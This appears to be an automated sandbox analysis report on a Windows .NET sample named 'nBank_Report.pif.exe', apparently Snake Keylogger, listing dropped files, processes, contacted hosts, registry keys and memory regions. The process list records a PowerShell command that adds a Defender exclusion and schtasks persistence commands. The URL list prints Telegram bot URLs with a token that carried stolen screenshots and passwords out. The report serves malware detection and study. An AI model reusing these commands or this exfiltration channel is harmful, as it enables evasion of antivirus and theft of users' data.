Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
nBank_Report.pif.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nBank_Report.pif.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\tmp6F97.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VtPPJdSqnkbmja.e_54ceb08e8bfad9f92dfc1bc5b3988cc6f2cada_8be0a55d_1571f6fa-7dfe-4fa9-a562-830001c7ca32\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EF6.tmp.dmp
|
Mini DuMP crash report, 15 streams, Thu Sep 26 09:33:40 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER910A.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9188.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VtPPJdSqnkbmja.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1mxjv2f.lly.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbrz1ysr.d2a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwdxhkuf.gqw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uigdoxfc.3su.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp8A91.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
||
|
C:\Users\user\Documents\SnakeKeylogger\Screenshot.png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
There are 9 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\nBank_Report.pif.exe
|
"C:\Users\user\Desktop\nBank_Report.pif.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp"
|
|
|
|
C:\Users\user\Desktop\nBank_Report.pif.exe
|
"C:\Users\user\Desktop\nBank_Report.pif.exe"
|
|
|
|
C:\Users\user\Desktop\nBank_Report.pif.exe
|
"C:\Users\user\Desktop\nBank_Report.pif.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
|
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp"
|
|
|
|
C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
|
"C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2540
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.telegram.org
|
unknown
|
|
|
|
https://api.telegram.org/bot
|
unknown
|
|
|
|
https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1
|
149.154.167.220
|
|
|
|
https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake
|
149.154.167.220
|
|
|
|
http://checkip.dyndns.org/
|
132.226.247.73
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.33$
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
http://reallyfreegeoip.org
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
http://checkip.dyndns.com
|
unknown
|
||
|
https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.33
|
188.114.96.3
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://purl.oen
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
reallyfreegeoip.org
|
188.114.96.3
|
|
|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
checkip.dyndns.org
|
unknown
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
checkip.dyndns.com
|
132.226.247.73
|
||
|
windowsupdatebg.s.llnwi.net
|
87.248.204.0
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
188.114.96.3
|
reallyfreegeoip.org
|
European Union
|
|
|
|
132.226.247.73
|
checkip.dyndns.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore
|
DisableSR
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\nBank_Report_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System
|
DisableCMD
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\VtPPJdSqnkbmja_RASMANCS
|
FileDirectory
|
There are 21 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
40CD000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
2A71000
|
trusted library allocation
|
page read and write
|
|
|
|
7090000
|
heap
|
page read and write
|
|
|
|
402D000
|
trusted library allocation
|
page read and write
|
|
|
|
62F0000
|
heap
|
page read and write
|
|
|
|
4995000
|
trusted library allocation
|
page read and write
|
|
|
|
2AF9000
|
trusted library allocation
|
page read and write
|
|
|
|
28A1000
|
trusted library allocation
|
page read and write
|
|
|
|
3D9E000
|
trusted library allocation
|
page read and write
|
|
|
|
2B1B000
|
trusted library allocation
|
page read and write
|
|
|
|
274E000
|
stack
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
56DE000
|
stack
|
page read and write
|
||
|
6830000
|
trusted library allocation
|
page read and write
|
||
|
AA6000
|
heap
|
page read and write
|
||
|
62AE000
|
stack
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
619B000
|
heap
|
page read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
2949000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
heap
|
page read and write
|
||
|
4FF0000
|
heap
|
page read and write
|
||
|
28C2000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
trusted library allocation
|
page read and write
|
||
|
5B6E000
|
stack
|
page read and write
|
||
|
C78000
|
heap
|
page read and write
|
||
|
14CF000
|
stack
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
10E4000
|
trusted library allocation
|
page read and write
|
||
|
A5AE000
|
stack
|
page read and write
|
||
|
3AD9000
|
trusted library allocation
|
page read and write
|
||
|
5700000
|
trusted library allocation
|
page read and write
|
||
|
6FE0000
|
heap
|
page read and write
|
||
|
5840000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
5100000
|
heap
|
page read and write
|
||
|
5490000
|
trusted library allocation
|
page read and write
|
||
|
15A7000
|
heap
|
page read and write
|
||
|
104E000
|
stack
|
page read and write
|
||
|
65FE000
|
stack
|
page read and write
|
||
|
A56E000
|
stack
|
page read and write
|
||
|
2AF5000
|
trusted library allocation
|
page read and write
|
||
|
54F0000
|
heap
|
page execute and read and write
|
||
|
116B000
|
heap
|
page read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
4185000
|
trusted library allocation
|
page read and write
|
||
|
4E98000
|
trusted library allocation
|
page read and write
|
||
|
88B000
|
stack
|
page read and write
|
||
|
617000
|
heap
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
4DD6000
|
trusted library allocation
|
page read and write
|
||
|
3FEC000
|
trusted library allocation
|
page read and write
|
||
|
408C000
|
trusted library allocation
|
page read and write
|
||
|
8020000
|
trusted library section
|
page read and write
|
||
|
C0B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6375000
|
heap
|
page read and write
|
||
|
581D000
|
stack
|
page read and write
|
||
|
1657000
|
heap
|
page read and write
|
||
|
636D000
|
heap
|
page read and write
|
||
|
B78000
|
unkown
|
page readonly
|
||
|
646E000
|
stack
|
page read and write
|
||
|
603D000
|
stack
|
page read and write
|
||
|
530E000
|
stack
|
page read and write
|
||
|
14FE000
|
stack
|
page read and write
|
||
|
4226000
|
trusted library allocation
|
page read and write
|
||
|
A93C000
|
stack
|
page read and write
|
||
|
5470000
|
heap
|
page read and write
|
||
|
BDD000
|
trusted library allocation
|
page execute and read and write
|
||
|
E8A000
|
stack
|
page read and write
|
||
|
61AE000
|
stack
|
page read and write
|
||
|
5A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1380000
|
trusted library allocation
|
page read and write
|
||
|
A6F0000
|
heap
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
7F9E000
|
stack
|
page read and write
|
||
|
294E000
|
trusted library allocation
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
7F440000
|
trusted library allocation
|
page execute and read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
50E000
|
unkown
|
page read and write
|
||
|
3E99000
|
trusted library allocation
|
page read and write
|
||
|
2993000
|
trusted library allocation
|
page read and write
|
||
|
57E0000
|
heap
|
page read and write
|
||
|
C48000
|
heap
|
page read and write
|
||
|
28E0000
|
trusted library allocation
|
page read and write
|
||
|
138A000
|
trusted library allocation
|
page execute and read and write
|
||
|
453000
|
remote allocation
|
page execute and read and write
|
||
|
51E0000
|
heap
|
page execute and read and write
|
||
|
553C000
|
stack
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
5860000
|
heap
|
page read and write
|
||
|
ABAE000
|
stack
|
page read and write
|
||
|
1123000
|
trusted library allocation
|
page execute and read and write
|
||
|
4DE0000
|
trusted library allocation
|
page read and write
|
||
|
5400000
|
trusted library allocation
|
page read and write
|
||
|
15A0000
|
heap
|
page read and write
|
||
|
4235000
|
trusted library allocation
|
page read and write
|
||
|
3023000
|
trusted library allocation
|
page read and write
|
||
|
A36D000
|
stack
|
page read and write
|
||
|
A97D000
|
stack
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
6372000
|
heap
|
page read and write
|
||
|
A8CE000
|
stack
|
page read and write
|
||
|
BC0000
|
trusted library allocation
|
page read and write
|
||
|
7C2E000
|
stack
|
page read and write
|
||
|
4FB1000
|
trusted library allocation
|
page read and write
|
||
|
3FD8000
|
trusted library allocation
|
page read and write
|
||
|
55D2000
|
heap
|
page read and write
|
||
|
406C000
|
trusted library allocation
|
page read and write
|
||
|
6AAC000
|
stack
|
page read and write
|
||
|
55A1000
|
heap
|
page read and write
|
||
|
4FA5000
|
trusted library allocation
|
page read and write
|
||
|
2AD7000
|
trusted library allocation
|
page read and write
|
||
|
5980000
|
heap
|
page read and write
|
||
|
EAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
71F0000
|
heap
|
page read and write
|
||
|
6F4C000
|
stack
|
page read and write
|
||
|
5460000
|
trusted library allocation
|
page execute and read and write
|
||
|
50C0000
|
heap
|
page execute and read and write
|
||
|
5690000
|
heap
|
page read and write
|
||
|
67F2000
|
trusted library allocation
|
page read and write
|
||
|
BD3000
|
trusted library allocation
|
page execute and read and write
|
||
|
BF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
67C0000
|
trusted library allocation
|
page read and write
|
||
|
28C7000
|
trusted library allocation
|
page execute and read and write
|
||
|
65BE000
|
stack
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
612E000
|
stack
|
page read and write
|
||
|
2E4F000
|
stack
|
page read and write
|
||
|
544E000
|
stack
|
page read and write
|
||
|
132E000
|
stack
|
page read and write
|
||
|
5EAF000
|
stack
|
page read and write
|
||
|
4DB9000
|
trusted library allocation
|
page read and write
|
||
|
134E000
|
stack
|
page read and write
|
||
|
3B0C000
|
trusted library allocation
|
page read and write
|
||
|
F87000
|
stack
|
page read and write
|
||
|
65AE000
|
stack
|
page read and write
|
||
|
2E50000
|
trusted library allocation
|
page read and write
|
||
|
150E000
|
stack
|
page read and write
|
||
|
1600000
|
trusted library allocation
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
114E000
|
heap
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
11FD000
|
heap
|
page read and write
|
||
|
5FAD000
|
unkown
|
page read and write
|
||
|
28B0000
|
trusted library allocation
|
page read and write
|
||
|
120D000
|
heap
|
page read and write
|
||
|
1DD000
|
stack
|
page read and write
|
||
|
A16D000
|
stack
|
page read and write
|
||
|
AF6C000
|
stack
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
729E000
|
stack
|
page read and write
|
||
|
546F000
|
stack
|
page read and write
|
||
|
4FE0000
|
trusted library allocation
|
page read and write
|
||
|
EA0000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
725E000
|
stack
|
page read and write
|
||
|
56F0000
|
trusted library allocation
|
page read and write
|
||
|
3C55000
|
trusted library allocation
|
page read and write
|
||
|
5830000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E91000
|
trusted library allocation
|
page read and write
|
||
|
1166000
|
heap
|
page read and write
|
||
|
537B000
|
trusted library allocation
|
page read and write
|
||
|
286E000
|
stack
|
page read and write
|
||
|
54A8000
|
heap
|
page read and write
|
||
|
54E0000
|
heap
|
page read and write
|
||
|
4B4C000
|
stack
|
page read and write
|
||
|
ABBE000
|
stack
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
FCE000
|
stack
|
page read and write
|
||
|
4A35000
|
trusted library allocation
|
page read and write
|
||
|
63C2000
|
heap
|
page read and write
|
||
|
4DD4000
|
trusted library allocation
|
page read and write
|
||
|
41F3000
|
trusted library allocation
|
page read and write
|
||
|
161E000
|
trusted library allocation
|
page read and write
|
||
|
EA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1182000
|
heap
|
page read and write
|
||
|
29F5000
|
trusted library allocation
|
page read and write
|
||
|
2A50000
|
trusted library allocation
|
page read and write
|
||
|
739D000
|
stack
|
page read and write
|
||
|
7F90000
|
trusted library section
|
page read and write
|
||
|
76AE000
|
stack
|
page read and write
|
||
|
64AE000
|
stack
|
page read and write
|
||
|
1640000
|
trusted library allocation
|
page read and write
|
||
|
1130000
|
trusted library allocation
|
page read and write
|
||
|
54A0000
|
trusted library section
|
page readonly
|
||
|
41A0000
|
trusted library allocation
|
page read and write
|
||
|
6EC0000
|
heap
|
page execute and read and write
|
||
|
C5A000
|
heap
|
page read and write
|
||
|
67A6000
|
trusted library allocation
|
page read and write
|
||
|
28BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7209000
|
heap
|
page read and write
|
||
|
BF0000
|
trusted library allocation
|
page read and write
|
||
|
710D000
|
heap
|
page read and write
|
||
|
3E91000
|
trusted library allocation
|
page read and write
|
||
|
11D1000
|
heap
|
page read and write
|
||
|
1382000
|
trusted library allocation
|
page read and write
|
||
|
2890000
|
heap
|
page execute and read and write
|
||
|
13AB000
|
stack
|
page read and write
|
||
|
7CBE000
|
stack
|
page read and write
|
||
|
11A2000
|
heap
|
page read and write
|
||
|
2B0E000
|
trusted library allocation
|
page read and write
|
||
|
AC2000
|
unkown
|
page readonly
|
||
|
51B0000
|
trusted library allocation
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
1560000
|
trusted library allocation
|
page read and write
|
||
|
3F31000
|
trusted library allocation
|
page read and write
|
||
|
D1F000
|
heap
|
page read and write
|
||
|
64BE000
|
stack
|
page read and write
|
||
|
28B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
5402000
|
trusted library allocation
|
page read and write
|
||
|
63B7000
|
heap
|
page read and write
|
||
|
C7F000
|
stack
|
page read and write
|
||
|
28CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
3079000
|
trusted library allocation
|
page read and write
|
||
|
29A1000
|
trusted library allocation
|
page read and write
|
||
|
67D0000
|
trusted library allocation
|
page read and write
|
||
|
BE0000
|
trusted library allocation
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
A6AE000
|
stack
|
page read and write
|
||
|
1110000
|
trusted library allocation
|
page read and write
|
||
|
696A000
|
stack
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
1392000
|
trusted library allocation
|
page read and write
|
||
|
67DB000
|
trusted library allocation
|
page read and write
|
||
|
4DA4000
|
trusted library allocation
|
page read and write
|
||
|
11CB000
|
heap
|
page read and write
|
||
|
115D000
|
heap
|
page read and write
|
||
|
582B000
|
trusted library allocation
|
page read and write
|
||
|
139B000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FB7000
|
trusted library allocation
|
page read and write
|
||
|
A3A000
|
stack
|
page read and write
|
||
|
15FF000
|
stack
|
page read and write
|
||
|
B7B000
|
unkown
|
page readonly
|
||
|
38A1000
|
trusted library allocation
|
page read and write
|
||
|
29E1000
|
trusted library allocation
|
page read and write
|
||
|
4DC5000
|
trusted library allocation
|
page read and write
|
||
|
642E000
|
stack
|
page read and write
|
||
|
2A2F000
|
trusted library allocation
|
page read and write
|
||
|
7106000
|
heap
|
page read and write
|
||
|
5460000
|
heap
|
page read and write
|
||
|
63BC000
|
heap
|
page read and write
|
||
|
6391000
|
heap
|
page read and write
|
||
|
1397000
|
trusted library allocation
|
page execute and read and write
|
||
|
54C0000
|
heap
|
page read and write
|
||
|
E90000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
1117000
|
trusted library allocation
|
page execute and read and write
|
||
|
295A000
|
trusted library allocation
|
page read and write
|
||
|
2A4B000
|
trusted library allocation
|
page read and write
|
||
|
5568000
|
heap
|
page read and write
|
||
|
6800000
|
heap
|
page read and write
|
||
|
7135000
|
heap
|
page read and write
|
||
|
D1F000
|
heap
|
page read and write
|
||
|
6F50000
|
heap
|
page read and write
|
||
|
735E000
|
stack
|
page read and write
|
||
|
BD4000
|
trusted library allocation
|
page read and write
|
||
|
5960000
|
heap
|
page read and write
|
||
|
5AEE000
|
stack
|
page read and write
|
||
|
AC0000
|
unkown
|
page readonly
|
||
|
61EE000
|
stack
|
page read and write
|
||
|
10FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
5370000
|
trusted library allocation
|
page read and write
|
||
|
538E000
|
trusted library allocation
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
29F1000
|
trusted library allocation
|
page read and write
|
||
|
53B0000
|
trusted library allocation
|
page read and write
|
||
|
62EF000
|
stack
|
page read and write
|
||
|
A6ED000
|
stack
|
page read and write
|
||
|
5EEE000
|
stack
|
page read and write
|
||
|
2A4E000
|
stack
|
page read and write
|
||
|
987000
|
stack
|
page read and write
|
||
|
4FAE000
|
trusted library allocation
|
page read and write
|
||
|
CBC000
|
heap
|
page read and write
|
||
|
AFAE000
|
stack
|
page read and write
|
||
|
BA8000
|
unkown
|
page readonly
|
||
|
5470000
|
trusted library allocation
|
page read and write
|
||
|
AE6B000
|
stack
|
page read and write
|
||
|
5820000
|
trusted library allocation
|
page read and write
|
||
|
A3D000
|
stack
|
page read and write
|
||
|
5E6E000
|
stack
|
page read and write
|
||
|
5410000
|
trusted library allocation
|
page execute and read and write
|
||
|
548E000
|
stack
|
page read and write
|
||
|
5710000
|
heap
|
page execute and read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
EB0000
|
trusted library allocation
|
page read and write
|
||
|
78E000
|
stack
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
2A06000
|
trusted library allocation
|
page read and write
|
||
|
76E2000
|
trusted library allocation
|
page read and write
|
||
|
50CC000
|
stack
|
page read and write
|
||
|
1167000
|
heap
|
page read and write
|
||
|
67A0000
|
trusted library allocation
|
page read and write
|
||
|
5473000
|
heap
|
page read and write
|
||
|
A1BD000
|
stack
|
page read and write
|
||
|
11B8000
|
heap
|
page read and write
|
||
|
2F31000
|
trusted library allocation
|
page read and write
|
||
|
638D000
|
heap
|
page read and write
|
||
|
4FC2000
|
trusted library allocation
|
page read and write
|
||
|
C67000
|
heap
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
642D000
|
stack
|
page read and write
|
||
|
6820000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D6E000
|
stack
|
page read and write
|
||
|
67D3000
|
trusted library allocation
|
page read and write
|
||
|
ABED000
|
stack
|
page read and write
|
||
|
6A6D000
|
stack
|
page read and write
|
||
|
2AC5000
|
trusted library allocation
|
page read and write
|
||
|
38C9000
|
trusted library allocation
|
page read and write
|
||
|
29E5000
|
trusted library allocation
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
70F5000
|
heap
|
page read and write
|
||
|
E3A000
|
stack
|
page read and write
|
||
|
2A14000
|
trusted library allocation
|
page read and write
|
||
|
5540000
|
heap
|
page read and write
|
||
|
CD0000
|
heap
|
page read and write
|
||
|
5AAE000
|
stack
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
111B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1350000
|
trusted library allocation
|
page execute and read and write
|
||
|
B0AE000
|
stack
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
2750000
|
trusted library allocation
|
